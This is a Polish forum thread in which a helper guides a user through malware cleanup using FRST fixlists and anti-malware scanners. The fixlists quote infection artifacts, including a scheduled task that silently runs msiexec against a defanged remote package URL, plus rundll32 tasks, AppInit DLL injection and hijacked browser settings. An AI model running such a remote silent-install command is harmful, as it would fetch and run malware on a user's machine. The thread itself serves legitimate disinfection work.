Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Długie wczytywanie stron, powolne działanie komputera

szymon189 27 Paź 2018 22:11 147 5
  • #2 27 Paź 2018 22:17
    Kolobos
    Spec od komputerów

    Odinstaluj AVG i sprawdz ponownie.

    Fixlist.txt:
    Task: {57087595-5758-41A9-9318-772D711E74F7} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\Scheduler.exe [2018-09-19] (IObit)
    Task: {7E60BDDC-10A4-4114-BCB0-35C1BB3039B6} - System32\Tasks\Driver Booster SkipUAC (Szymon) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe [2018-09-20] (IObit)
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\...\Run: [Polar FlowSync] => [X]
    GroupPolicy: Ograniczenia ? <==== UWAGA

    W niczym nie pomoze i niczego specjalnie nie zmieni.

    0
  • #4 03 Lis 2018 13:13
    Kolobos
    Spec od komputerów

    Chyba? Bardziej juz chyba nie mogles zainfekowac. Raczej nie powinienes juz niczego sciagac z internetu...

    Zgaduje, ze ktorys z tych plikow jest odpowiedzialny:
    2018-11-03 12:25 - 2018-11-03 12:26 - 003183391 _____ C:\Users\Szymon\Downloads\Download_iGO_World_data_zip_rar.rar
    2018-11-03 12:25 - 2018-11-03 12:26 - 003183390 _____ C:\Users\Szymon\Downloads\Download_iGO_World_data_zip_rar(1).rar
    2018-11-03 12:23 - 2018-11-03 12:24 - 287094091 _____ C:\Users\Szymon\Downloads\iGO World 9.18.27.736653 - 19.jun.2018(1).rar
    Wszystkie trzy usunie skrypt.

    Odinstaluj:
    DiskWMpower version 1.0
    SafeFinder
    YoutubeAdBlock

    Uzyj AdwCleaner, opcja Scan/Szukaj i Clean/Usun: http://www.bleepingcomputer.com/download/adwcleaner/

    Wykonaj Fixlist.txt dla FRST:
    CloseProcesses:
    ContextMenuHandlers6: [Fast Explorer] -> {693BE9C0-BEC3-11D2-B4C1-C33BBD3AD64B} => -> Brak pliku
    Task: {1CA06697-283F-48E2-B822-8B0C58B57402} - System32\Tasks\lKLHkisATsnNjPT2 => rundll32 "C:\Program Files (x86)\VXIXCZnnU\zBWBPR.dll",#1.)
    Task: {3BE2D2CA-3353-46F0-8156-AB8F3BCD901C} - System32\Tasks\dPIEEDxCPUYvKtIKKhr2 => rundll32 "C:\Program Files (x86)\VBeLgSlZrsYKC\jeKqsmQ.dll",#1
    Task: {462A46B0-4AD9-4BC6-8E53-C10A04B00CC7} - System32\Tasks\JbRbPldPaXVcEk => rundll32 "C:\Program Files (x86)\JEkILdsaHvdU2\UzbBUWBBEPfRj.dll",#1
    Task: {58DBC077-51DB-421B-8435-357A6566CF33} - System32\Tasks\EZDWuPrvwhnlY2 => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\ZJlwACxPIpGmpNVB\RaeAmFf.wsf"
    Task: {5BB6CB27-82FC-4ED5-975B-C6C7ACFC466C} - System32\Tasks\{2A28DE1B-4BA7-5483-4276-2981AEB77F44} => C:\WINDOWS\ETAiVfub.exe [2018-08-03] (Microsoft Corporation)
    C:\WINDOWS\ETAiVfub.exe
    Task: {685173AA-7DC4-43E4-93D6-6BD384EE8CFD} - System32\Tasks\cZAtztbWkvttEsiJa2 => rundll32 "C:\Program Files (x86)\YFseyhTTSweoDxcixvR\QwbnNlq.dll",#1
    Task: {AEBFCB8C-7A22-43BE-9695-F546B261A729} - System32\Tasks\23b30166-bf8f-4f94-b2b4-8244e0967f87 => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2018-11-01] ()
    Task: {B492C385-B5A3-4C85-AB38-2FC09234614E} - System32\Tasks\{72AE0148-77CB-7A83-AB92-67545E0A84E1} => "msiexec" -package hxxps://refreshnerer1510.info/E4KBsGH5rj3G.78a /q
    Hosts:
    () C:\Program Files (x86)\uuovhzhx2oa\VKI7BGCHU24LC06.exe
    () C:\Users\Szymon\AppData\Local\Temp\BIRTSPKFIX\up.exe
    () C:\Program Files\GURYNKX1YJ\GURYNKX1Y.exe
    () C:\Program Files (x86)\uuovhzhx2oa\Y0NRM.exe
    () C:\Program Files\4NHBPFOUDW\Y2YIHIED8.exe
    () C:\Program Files\YV7DZPTAYG\PRP07VSFM.exe
    () C:\Program Files\Reference Assemblies\879S47AWTJ9RZ8FSR\MXfmr#z3çj.exe
    () C:\ProgramData\PrefsSecure\Nettrans.exe




    () C:\Program Files\Reference Assemblies\879S47AWTJ9RZ8FSR\UpdateInstall.exe
    (TODO: <Company name>) C:\ProgramData\Kolnixo\Kolnixo.exe
    () C:\ProgramData\Logic Cramble\set.exe
    ( ) C:\Users\Szymon\AppData\Local\Temp\ZNiuMFEA0\ZNiuMFEA0.exe
    () C:\Users\Szymon\AppData\Local\Temp\is-E9BEQ.tmp\ZNiuMFEA0.tmp
    () C:\Program Files\AGN6751YQJ\AGN6751YQ.exe
    () C:\Program Files\OG8AQI9Z5G\OG8AQI9Z5.exe
    HKLM-x32\...\Run: [DiskPower] => C:\Program Files (x86)\DiskWMpower\DiskPower.exe [210432 2017-02-10] () <==== UWAGA
    HKLM\...\RunOnce: [OMEWPRODUCT_JAERD] => C:\Program Files (x86)\uuovhzhx2oa\VKI7BGCHU24LC06.exe [484352 2018-11-03] () <==== UWAGA
    HKLM\...\RunOnce: [OMEWPRODUCT_] => C:\Program Files\Reference Assemblies\879S47AWTJ9RZ8FSR\ATuOlnRC59.exe [297472 2018-11-03] ()
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\...\Run: [U16JVW9CWJVR2K2] => C:\Program Files\GURYNKX1YJ\GURYNKX1Y.exe [1098752 2018-11-03] ()
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\...\Run: [KCYEKCMDSHBRAL8] => C:\Program Files (x86)\uuovhzhx2oa\Y0NRM.exe [1098752 2018-11-03] ()
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\...\Run: [JG7XISRL8PJ79OV] => C:\Program Files\4NHBPFOUDW\Y2YIHIED8.exe [1098752 2018-11-03] ()
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\...\Run: [XGS005ZMNMDH5O9] => C:\Program Files\YV7DZPTAYG\PRP07VSFM.exe [1098752 2018-11-03] ()
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\...\Run: [LAL6JEP19SQ3TBS] => C:\Program Files\OG8AQI9Z5G\OG8AQI9Z5.exe [1098752 2018-11-03] ()
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\...\Run: [JASGRNKPRZ17Q03] => C:\Program Files\AGN6751YQJ\AGN6751YQ.exe [1098752 2018-11-03] ()
    AppInit_DLLs: C:\ProgramData\Kolnixo\Zaamtanzap.dll => C:\ProgramData\Kolnixo\Zaamtanzap.dll [342528 2018-11-03] ()
    AppInit_DLLs-x32: C:\ProgramData\Kolnixo\Softdubsoft.dll => C:\ProgramData\Kolnixo\Softdubsoft.dll [460800 2018-11-03] ()
    GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...3owiq6LI2ZQdC42GQBm4BOKss7bU1CYhLivA,,&q={searchTerms}
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61...c-vSojgC2FFIkIWS0BqqoLfPSWzF14VPhHBoq9WwZgQ,,,,
    HKU\S-1-5-80-1708958382-1225314969-3040366088-2957102912-3332197768\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...3owiq6LI2ZQdC42GQBm4BOKss7bU1CYhLivA,,&q={searchTerms}
    HKU\S-1-5-80-1708958382-1225314969-3040366088-2957102912-3332197768\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61...c-vSojgC2FFIkIWS0BqqoLfPSWzF14VPhHBoq9WwZgQ,,,,
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...3owiq6LI2ZQdC42GQBm4BOKss7bU1CYhLivA,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-4216960334-647529631-3073891758-1001 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...3owiq6LI2ZQdC42GQBm4BOKss7bU1CYhLivA,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-4216960334-647529631-3073891758-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...3owiq6LI2ZQdC42GQBm4BOKss7bU1CYhLivA,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-80-1708958382-1225314969-3040366088-2957102912-3332197768 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...3owiq6LI2ZQdC42GQBm4BOKss7bU1CYhLivA,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-80-1708958382-1225314969-3040366088-2957102912-3332197768 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...3owiq6LI2ZQdC42GQBm4BOKss7bU1CYhLivA,,&q={searchTerms}
    BHO: YoutubeAdBlock -> {586E89A6-A5B5-4B36-9440-4C12FF9C74E4} -> C:\Program Files (x86)\gHUgOvOJlIE\t4HfVd4.dll [2018-11-03] ()
    BHO-x32: YoutubeAdBlock -> {586E89A6-A5B5-4B36-9440-4C12FF9C74E4} -> C:\Program Files (x86)\gHUgOvOJlIE\keWq0TP.dll [2018-11-03] ()
    FF user.js: detected! => C:\Users\Szymon\AppData\Roaming\Mozilla\Firefox\Profiles\bsrefnmh.default\user.js [2017-06-30]
    FF Homepage: Mozilla\Firefox\Profiles\bsrefnmh.default -> file:///C:/ProgramData/Kolnixos/ff.HP
    FF NewTab: Mozilla\Firefox\Profiles\bsrefnmh.default -> file:///C:/ProgramData/Kolnixos/ff.NT
    FF Extension: (System Table) - C:\Users\Szymon\AppData\Roaming\Mozilla\Firefox\Profiles\bsrefnmh.default\Extensions\383882@modext.tech.xpi [2018-08-22]
    C:\Users\Szymon\AppData\Roaming\Mozilla\Firefox\Profiles\bsrefnmh.default\Extensions\383882@modext.tech.xpi
    FF Extension: (Brak nazwy) - C:\Program Files\Mozilla Firefox\browser\features\{32082DD9-C536-43AA-AF48-D266049C6FDA}.xpi [2018-11-03] [Brak podpisu cyfrowego]
    C:\Program Files\Mozilla Firefox\browser\features\{32082DD9-C536-43AA-AF48-D266049C6FDA}.xpi
    S2 AlphateamService; C:\ProgramData\AlphateamService\AlphateamService.exe [3712232 2018-11-03] ()
    R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-11-03] () <==== UWAGA
    R2 Kolnixo; C:\ProgramData\\Kolnixo\\Kolnixo.exe [1995264 2018-11-03] (TODO: <Company name>) [Brak podpisu cyfrowego]
    R2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [43520 2018-11-03] () <==== UWAGA
    2018-11-03 12:31 - 2018-11-03 12:31 - 000000000 ____D C:\Program Files\OG8AQI9Z5G
    2018-11-03 12:31 - 2018-11-03 12:31 - 000000000 ____D C:\Program Files\AGN6751YQJ
    2018-11-03 12:30 - 2018-11-03 12:31 - 000015614 _____ C:\WINDOWS\SysWOW64\findit.xml
    2018-11-03 12:30 - 2018-11-03 12:31 - 000000000 ____D C:\Users\Szymon\AppData\Local\WhiteClick
    2018-11-03 12:30 - 2018-11-03 12:30 - 000003212 _____ C:\WINDOWS\System32\Tasks\JbRbPldPaXVcEk
    2018-11-03 12:30 - 2018-11-03 12:30 - 000003044 _____ C:\WINDOWS\System32\Tasks\EZDWuPrvwhnlY2
    2018-11-03 12:30 - 2018-11-03 12:30 - 000003034 _____ C:\WINDOWS\System32\Tasks\cZAtztbWkvttEsiJa2
    2018-11-03 12:30 - 2018-11-03 12:30 - 000003026 _____ C:\WINDOWS\System32\Tasks\dPIEEDxCPUYvKtIKKhr2
    2018-11-03 12:30 - 2018-11-03 12:30 - 000003008 _____ C:\WINDOWS\System32\Tasks\lKLHkisATsnNjPT2
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\Users\Szymon\AppData\Roaming\WidModule
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\ProgramData\ZJlwACxPIpGmpNVB
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\ProgramData\Logic Cramble
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\ProgramData\Kolnixos
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\Program Files (x86)\YFseyhTTSweoDxcixvR
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\Program Files (x86)\VXIXCZnnU
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\Program Files (x86)\VBeLgSlZrsYKC
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\Program Files (x86)\JEkILdsaHvdU2
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\Program Files (x86)\gnogaTRWAYUn
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\Program Files (x86)\gHUgOvOJlIE
    2018-11-03 12:29 - 2018-11-03 12:40 - 000000000 ____D C:\ProgramData\Kolnixo
    2018-11-03 12:29 - 2018-11-03 12:39 - 000000000 ____D C:\Program Files (x86)\uuovhzhx2oa
    2018-11-03 12:29 - 2018-11-03 12:29 - 007800320 _____ C:\Users\Szymon\AppData\Local\agent.dat
    2018-11-03 12:29 - 2018-11-03 12:29 - 002020197 _____ C:\Users\Szymon\AppData\Local\Lamity.tst
    2018-11-03 12:29 - 2018-11-03 12:29 - 000126464 _____ C:\Users\Szymon\AppData\Local\noah.dat
    2018-11-03 12:29 - 2018-11-03 12:29 - 000070896 _____ C:\Users\Szymon\AppData\Local\Config.xml
    2018-11-03 12:29 - 2018-11-03 12:29 - 000018432 _____ C:\Users\Szymon\AppData\Local\Main.dat
    2018-11-03 12:29 - 2018-11-03 12:29 - 000005568 _____ C:\Users\Szymon\AppData\Local\md.xml
    2018-11-03 12:29 - 2018-11-03 12:29 - 000003478 _____ C:\WINDOWS\System32\Tasks\23b30166-bf8f-4f94-b2b4-8244e0967f87
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\ProgramData\PrefsSecure
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\ProgramData\AlphateamService
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\ProgramData\8607927d-7035-0
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\ProgramData\8607927d-6fc7-1
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\Program Files\YV7DZPTAYG
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\Program Files\GURYNKX1YJ
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\Program Files\4NHBPFOUDW
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\Program Files (x86)\foldershare
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\Program Files (x86)\DiskWMpower
    2018-11-03 12:29 - 2018-11-03 12:27 - 001995264 _____ (TODO: <Company name>) C:\Users\Szymon\AppData\Local\Lamity.exe
    2018-11-03 12:28 - 2018-11-03 12:30 - 000000000 ____D C:\Users\Szymon\AppData\Roaming\One System Care
    2018-11-03 12:28 - 2018-11-03 12:29 - 000000000 ____D C:\Program Files (x86)\OneSystemCare
    2018-11-03 12:28 - 2018-11-03 12:28 - 000278509 _____ C:\Users\Szymon\AppData\Local\Biofresh.bin
    2018-11-03 12:28 - 2018-11-03 12:28 - 000003748 _____ C:\WINDOWS\System32\Tasks\{72AE0148-77CB-7A83-AB92-67545E0A84E1}
    2018-11-03 12:28 - 2018-11-03 12:28 - 000003582 _____ C:\WINDOWS\System32\Tasks\{2A28DE1B-4BA7-5483-4276-2981AEB77F44}
    2018-11-03 12:28 - 2018-11-03 12:28 - 000001052 _____ C:\Users\Szymon\Desktop\Adult Dating.lnk
    2018-11-03 12:28 - 2018-11-03 12:28 - 000001044 _____ C:\Users\Szymon\Desktop\Win iPhone X.lnk
    2018-11-03 12:28 - 2018-11-03 12:28 - 000001020 _____ C:\Users\Szymon\Desktop\Launch One System Care.lnk
    2018-11-03 12:28 - 2018-11-03 12:28 - 000000003 _____ C:\Users\Szymon\AppData\Local\wbem.ini
    2018-11-03 12:28 - 2018-11-03 12:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
    2018-11-03 12:28 - 2018-11-03 12:28 - 000000000 ____D C:\ProgramData\817025a2-75a1-46fb-b7cb-4e88ac947d5a
    2018-11-03 12:28 - 2018-08-03 08:32 - 000060416 ____N (Microsoft Corporation) C:\WINDOWS\ETAiVfub.exe
    2018-11-03 12:28 - 2018-04-12 00:34 - 000178688 ____N (Microsoft Corporation) C:\Program Files (x86)\aOpXUSd.exe
    2018-11-03 12:27 - 2018-11-03 12:31 - 000722944 _____ C:\Users\Szymon\AppData\Local\sham.db
    2018-11-03 12:27 - 2018-11-03 12:28 - 000017664 _____ C:\Users\Szymon\AppData\Local\InstallationConfiguration.xml
    2018-11-03 12:27 - 2018-11-03 12:27 - 000140800 _____ C:\Users\Szymon\AppData\Local\installer.dat
    2018-11-03 12:25 - 2018-11-03 12:26 - 003183391 _____ C:\Users\Szymon\Downloads\Download_iGO_World_data_zip_rar.rar
    2018-11-03 12:25 - 2018-11-03 12:26 - 003183390 _____ C:\Users\Szymon\Downloads\Download_iGO_World_data_zip_rar(1).rar
    2018-11-03 12:23 - 2018-11-03 12:24 - 287094091 _____ C:\Users\Szymon\Downloads\iGO World 9.18.27.736653 - 19.jun.2018(1).rar
    2018-11-03 12:28 - 2018-04-12 00:34 - 000178688 ____N (Microsoft Corporation) C:\Program Files (x86)\aOpXUSd.exe
    2018-11-03 12:28 - 2018-08-03 08:32 - 000060416 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\HAEOAByA.exe
    2018-11-03 12:29 - 2018-11-03 12:29 - 007800320 _____ () C:\Users\Szymon\AppData\Local\agent.dat
    2018-11-03 12:28 - 2018-11-03 12:28 - 000278509 _____ () C:\Users\Szymon\AppData\Local\Biofresh.bin
    2018-11-03 12:29 - 2018-11-03 12:29 - 000070896 _____ () C:\Users\Szymon\AppData\Local\Config.xml
    2018-06-10 11:32 - 2018-06-10 11:32 - 000003584 _____ () C:\Users\Szymon\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    2018-11-03 12:27 - 2018-11-03 12:28 - 000017664 _____ () C:\Users\Szymon\AppData\Local\InstallationConfiguration.xml
    2018-11-03 12:27 - 2018-11-03 12:27 - 000140800 _____ () C:\Users\Szymon\AppData\Local\installer.dat
    2018-11-03 12:29 - 2018-11-03 12:27 - 001995264 _____ (TODO: <Company name>) C:\Users\Szymon\AppData\Local\Lamity.exe
    2018-11-03 12:29 - 2018-11-03 12:29 - 002020197 _____ () C:\Users\Szymon\AppData\Local\Lamity.tst
    2018-11-03 12:29 - 2018-11-03 12:29 - 000018432 _____ () C:\Users\Szymon\AppData\Local\Main.dat
    2018-11-03 12:29 - 2018-11-03 12:29 - 000005568 _____ () C:\Users\Szymon\AppData\Local\md.xml
    2018-11-03 12:29 - 2018-11-03 12:29 - 000126464 _____ () C:\Users\Szymon\AppData\Local\noah.dat
    2018-11-03 12:27 - 2018-11-03 12:31 - 000722944 _____ () C:\Users\Szymon\AppData\Local\sham.db
    2018-11-03 12:30 - 2018-11-03 12:30 - 000032038 _____ () C:\Users\Szymon\AppData\Local\uninstall_temp.ico
    2018-11-03 12:28 - 2018-11-03 12:28 - 000000003 _____ () C:\Users\Szymon\AppData\Local\wbem.ini
    C:\Program Files (x86)\DiskWMpower\DiskPower.exe
    C:\Program Files (x86)\uuovhzhx2oa\VKI7BGCHU24LC06.exe
    EmptyTemp:

    Zrob pelny skan przy pomocy Mbam i usun to co wykryje:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/
    oraz http://ftp.drweb.com/pub/drweb/cureit/launch.exe

    Na koniec zamiesc nowe logi z FRST, ze skanowania.

    0
  • #6 03 Lis 2018 15:24
    Kolobos
    Spec od komputerów

    Nowy Fixlist.txt dla FRST:
    C:\Users\Szymon\AppData\Roaming\Mozilla\Firefox\Profiles\bsrefnmh.default\Extensions\{ed5a5d58-4e89-4ade-903c-34f4b64265cd}.xpi
    FF Extension: (Tpay.com) - C:\Users\Szymon\AppData\Roaming\Mozilla\Firefox\Profiles\bsrefnmh.default\Extensions\{ed5a5d58-4e89-4ade-903c-34f4b64265cd}.xpi [2017-09-
    HKLM\SYSTEM\CurrentControlSet\Services\458323237A0D3114 <==== UWAGA (Rootkit!)
    2018-11-03 13:30 - 2018-11-03 13:44 - 000000008 __RSH C:\Users\Szymon\ntuser.pol
    2018-11-03 13:25 - 2018-11-03 13:27 - 000000000 ____D C:\AdwCleaner

    Po wykonaniu usun katalog C:\FRST i to wszystko.

    0